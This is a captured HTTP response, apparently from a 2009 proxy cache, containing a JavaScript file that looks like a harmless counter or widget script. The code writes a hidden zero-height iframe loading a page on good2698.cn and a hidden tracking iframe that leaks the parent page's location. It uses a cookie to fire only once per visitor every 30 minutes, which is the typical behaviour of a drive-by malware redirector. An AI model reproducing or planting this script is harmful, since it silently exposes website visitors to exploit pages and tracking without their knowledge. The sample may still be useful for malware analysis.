HTTP/1.1 200 OK
Content-Length: 974
ETag: "b785fc699896c91:b61"
Date: Wed, 25 Feb 2009 10:23:01 GMT
Last-Modified: Tue, 24 Feb 2009 15:56:11 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://mon.qc.cx/asd.js?s=201&col=ffdd00
X-Polipo-Date: Wed, 25 Feb 2009 10:33:26 GMT
X-Polipo-Access: Wed, 25 Feb 2009 10:33:27 GMT

var sc=document.getElementsByTagName('script');
var paramsArr=sc[sc.length-1].src.split('//')[1].split('?');
var cookA = new String(document.cookie);
var Then = new Date();
var cookName = '9B4A4C5EBF042C02' ;
Then.setTime(Then.getTime() + 30*60*1000 );
var kesor = cookA.indexOf(cookName);
if (kesor == -1)
   {
document.write('<iframe src=http://www.good2698.cn/yhyw/2.htm width=50 height=0 border=0></iframe>');

document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://count47.51yes.com/sa.aspx?id=470909911&amp;refe='+window.parent.location+'&amp;location=http%3A//'+paramsArr[0]+'&amp;color=32x&amp;resolution=1024x768&amp;returning=0&amp;language=zh-cn&amp;ua=Mozilla/4.0%20%28compatible%3B%20MSIE%206.0%3B%20Windows%20NT%205.1%3B%20SV1%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.0.04506.30%29" frameBorder=0 width=0 scrolling=no height=0></IFRAME>');
   document.cookie = "A1="+ cookName +";expires="+ Then.toGMTString() +";path=/";
   }

